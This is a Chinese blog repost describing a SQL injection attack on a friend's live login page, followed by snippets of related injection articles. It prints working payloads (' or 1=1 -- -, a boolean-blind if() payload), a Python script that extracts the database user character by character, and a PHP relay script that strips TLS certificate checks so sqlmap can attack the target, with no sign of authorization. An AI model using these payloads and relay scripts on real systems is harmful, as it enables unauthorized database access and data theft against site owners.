一次sql注入中转

最新推荐文章于 2023-02-16 20:46:47 发布
最新推荐文章于 2023-02-16 20:46:47 发布
阅读量172 收藏
点赞数
文章标签: php xhtml
原文链接:http://www.cnblogs.com/depycode/p/5288243.html
版权

今天一朋友丢过来一个注入让我看看

url:http://xxxx/

先看下页面

常规测试一下

用户名输入:' or 1=1 -- -

密码任意

返回

用户名输入:' or 1=2 -- -

返回

 

基本可以判断存在注入

http request:

POST /xxxx.php HTTP/1.1
Host: xxxx
Connection: keep-alive
Content-Length: 56
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=q7m1tvv7gi017o9t86uck332e6

email=%27+or+1%3Dif%281%3D1%2C1%2C2%29--+-&password=fdaf

email:

email=' or 1=if(1=1 *,1,2)-- -

本以为这样我们就可以拿到sqlmap跑

然后sqlmap报错了

  

[14:19:03] [CRITICAL] can't establish SSL connection

应该于https 证书有关,sqlmap貌似不能忽略证书,谷歌也没找到解决方法。

但是不死心

用py撸吧

import requests
import warnings
warnings.filterwarnings("ignore")

b = range(32,127)
d = range(1,20)
for l in d:
    for a in b:
        c="' or 1=if(1=1 and ascii(substr(user(),%s,1))=%s,1,2)-- -"% (l,a)
        payload = {"email":c,"password":"aaa"}
        r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)
        s = len(r.text.encode('GBK','ignore'))
        #print s
        if s!=2769:
            print a
            continue

这里注意

r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)

verify=False 可以忽略证书

该脚本可以正常得出结果

 

但是不死心 sqlmap 这一神器跑步了 不甘心,所以想到了用中专的方法。

<?php

$url = "https://x.x.x.x/aaa.php";
$sql = $_GET[s];
$s = urlencode($sql);
$params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_HEADER, 0); 
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
 
curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
 
$output = curl_exec($ch);
curl_close($ch);
$a = strlen($output);
#echo $a;
if($a==2846){
    echo "1";
}else{
    echo "2";
}

这里注意一下,下面的两句忽略证书

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

然后抄起sqlmap就是干

  

收工。  

 

请勿转载!  

  

转载于:https://www.cnblogs.com/depycode/p/5288243.html

weixin_34128501
关注
flask mysql sql注入_SQL注入进阶-Flask中转SQLMAP案例
weixin_39797693的博客
02-06 205
前言在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?一道CTF题的思考先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
最新发布
weixin_47075747的博客
06-14 1169
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
注入中转工具
10-07
最强大的注入中转工具,你值得拥有
SQL注入——中转注入利用方法漏洞复现
W小哥
11-25 2439
一、 https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe <?php $id = base64_encode($_GET['id']); echo file_get_contents("http://219.153.49.228:46542/show.php?id=$id"); //base64_encode base67编码 //file_get_contents 网络请求 ?> ..
PHP sql中转注入
Pz_mstr's Blog
11-19 743
&lt;?php function encode($id){ $id = $id.'hxb2018'; $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,''); mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021'); $data = ba...
中转注入
ahqszbgaf775154642的博客
10-06 306
没技术含量,纯属记录之前学过的一个注入方法。百度一大堆的东西,以前写的,留恋。。。o(∩_∩)o 遇到这种情况很蛋疼。。。无法注入,那咋办啊?以前很多时候都是放弃了,知道有一天遇到中转注入,嘿嘿,我邪恶了。。。。 第一个框改为?后面的东西,把数值去掉 第二个框第三个框就是url,不要?后面的一串 第四个不用管他 第五个就把=后面写成注入点的数值 点击生成asp...
sqlmap中转注入
Anonymous
01-14 2172
当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__
注入中转生成器,可用
09-22
在IT安全领域,"注入中转生成器"是一种工具,主要用于测试和研究目的,它能够帮助安全专家模拟和分析SQL注入、XSS注入等类型的网络攻击。这些注入攻击是黑客常用的手段,通过在应用程序的数据输入点插入恶意代码,以...
cookie中转注入,使用sqlmap中转注入
椰树ii
04-29 7367
一,判断是否有cookie注入:目标网站http://www.xxx.com/x.asp?id=11.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访...
SQL注入之二次,加解密,DNS,中转等注入
weixin_51583033的博客
02-16 388
SQL注入之二次,加解密,DNS,中转等注入
注入中转方法的说明
weixin_30446197的博客
03-22 144
from:http://hi.baidu.com/csx163/blog/item/1f6372cfa86ac037f9dc6172.html 注入时如果发现有防注,可以试试红色部分是需要修改的假如http://www.fanzhiduxm.com/news.asp?Aid=195发现防注那么就改为下面内容,使用时本地搭一个ASP环境即可再用这一行代码进行注入http://127.0.0.1...
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3960
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
Cookie注入是怎样产生的
weixin_33725807的博客
01-12 385
现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~ 感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题! 所以就有了Cookies注入~~ 我们来研究一下怎样情况下才会有Cookies注入! 如果你学过ASP 你应该会知道Request.QueryString(GET) 或Request.Form(POST)! 呵,没错,这就...
sql注入基础
weixin_52657559的博客
10-27 1569
sql注入
SQL Server通过中转服务器实现端口转发
naruto2017的博客
06-19 3568
SQL Server服务器C放在客户公司,若要连接数据库,需要客户将IP地址加入授信列表。 由于公司没有静态IP,所以买了一个阿里云服务器B。 现在的目标是通过公司机器上的电脑A,连接阿里云服务器B,然后在服务器B上做端口转发, 从而连接到客户的SQL Server服务器C。 SQL Server用到两个端口: TCP端口:1433 UDP端口:1434 实现步骤:...
sql注入的方法
Winn~
01-20 1138
原创 2018-01-15 老刘 码农翻身1、什么是sql注入“原理非常简单,比如网站有个users表格,数据如下:” “这个网站有个功能,根据id来查看用户信息,http://xxxx.com/user?id=xxxx, 对应的SQL可能是这样的:”string sql =”SELECT id , name, age from users WHERE id=”+;如果用户在浏览器的URL 是 h
springboot sql 注入
05-10
Spring Boot 是基于 Spring 框架构建的,它可以通过自动配置和约定大于配置的方式来轻松创建独立的、生产级别的 Spring 应用程序。然而,Spring Boot 也存在 SQL 注入的风险,因此我们需要掌握相应的防范措施。 SQL 注入漏洞是指黑客利用合法的 SQL 查询接口,向应用程序的后台数据库发送针对数据库的攻击字符串,获取数据库的机密信息或通过修改数据库来破坏系统的安全性。在 Spring Boot 中,SQL 注入漏洞通常出现在动态拼接 SQL 语句的场景中,如使用 JdbcTemplate 进行数据库操作或通过 MyBatis 操作数据库时,如果不做正确的防范,就很容易发生 SQL 注入漏洞。 为了避免 SQL 注入漏洞的问题,我们可以采取以下措施: 1. 使用预处理语句:建议使用预处理语句,这样可以将传入的参数当做参数来处理,而不是当做 SQL 语句的一部分来处理。预处理语句可以有效地解决 SQL 注入问题,也可以提高应用程序的性能。 2. 使用参数中转:使用参数中转可以将直接拼接 SQL 语句的方式改为将参数值插入到预定义的 SQL 语句当中,从而避免 SQL 注入漏洞的风险。 3. 遵循安全编码规范:在进行开发工作时,应该遵循安全编码规范,对输入参数进行合理的检查和过滤,确保不会将恶意的输入传递给后台 SQL 语句。 总而言之,为了防范 SQL 注入漏洞,我们需要采取多种措施,如使用预处理语句、使用参数中转和遵循安全编码规范等,以确保应用程序的安全性。同时,开发人员也要不断学习新的安全技术和解决方案,提高系统的安全性和鲁棒性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值